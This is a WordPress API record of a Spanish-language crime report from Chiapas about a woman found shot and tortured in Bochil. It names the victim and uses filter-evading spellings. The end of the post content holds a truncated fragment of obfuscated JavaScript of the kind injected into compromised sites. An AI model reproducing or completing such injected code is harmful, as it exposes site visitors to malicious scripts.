{"id":21582,"date":"2025-04-25T23:26:41","date_gmt":"2025-04-25T23:26:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21582"},"modified":"2025-04-25T23:26:42","modified_gmt":"2025-04-25T23:26:42","slug":"localizan-a-mujer-con-el-t7r0-de-gracia-en-bochil","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21582","title":{"rendered":"Localizan a mujer con el T7r0 de gracia en Bochil"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250425-WA0027-768x1024.jpg\" alt=\"\" class=\"wp-image-21583\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250425-WA0027-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250425-WA0027-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250425-WA0027.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 25 de abril del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la ma\u00f1ana fue localizada una mujer con el T7r0 de gracia y con signos de tortur@ en el municipio de Bochil.<\/p>\n\n\n\n<p>De acuerdo con los primeros reportes, este hecho ocurri\u00f3 cuando se report\u00f3 el hallazgo del cuerp0 en una zona de matorrales.<\/p>\n\n\n\n<p>La v\u00edctima fue identificada como Jazm\u00edn Esmeralda del Barrio Las Moras propietaria de una hojalater\u00eda.<\/p>\n\n\n\n<p>La v\u00edctima era madre de dos menores.<\/p>\n\n\n\n<p>Perritos de la Fiscal\u00eda General del Estado realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 25 de abril del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la ma\u00f1ana fue localizada una mujer con el T7r0 de gracia y con signos de tortur@ en el municipio de Bochil. De acuerdo con los primeros reportes, este hecho ocurri\u00f3 cuando se report\u00f3 el hallazgo del cuerp0 en una zona de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21583,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21582","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21582","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21582"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21582\/revisions"}],"predecessor-version":[{"id":21584,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21582\/revisions\/21584"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21583"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21582"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21582"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21582"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}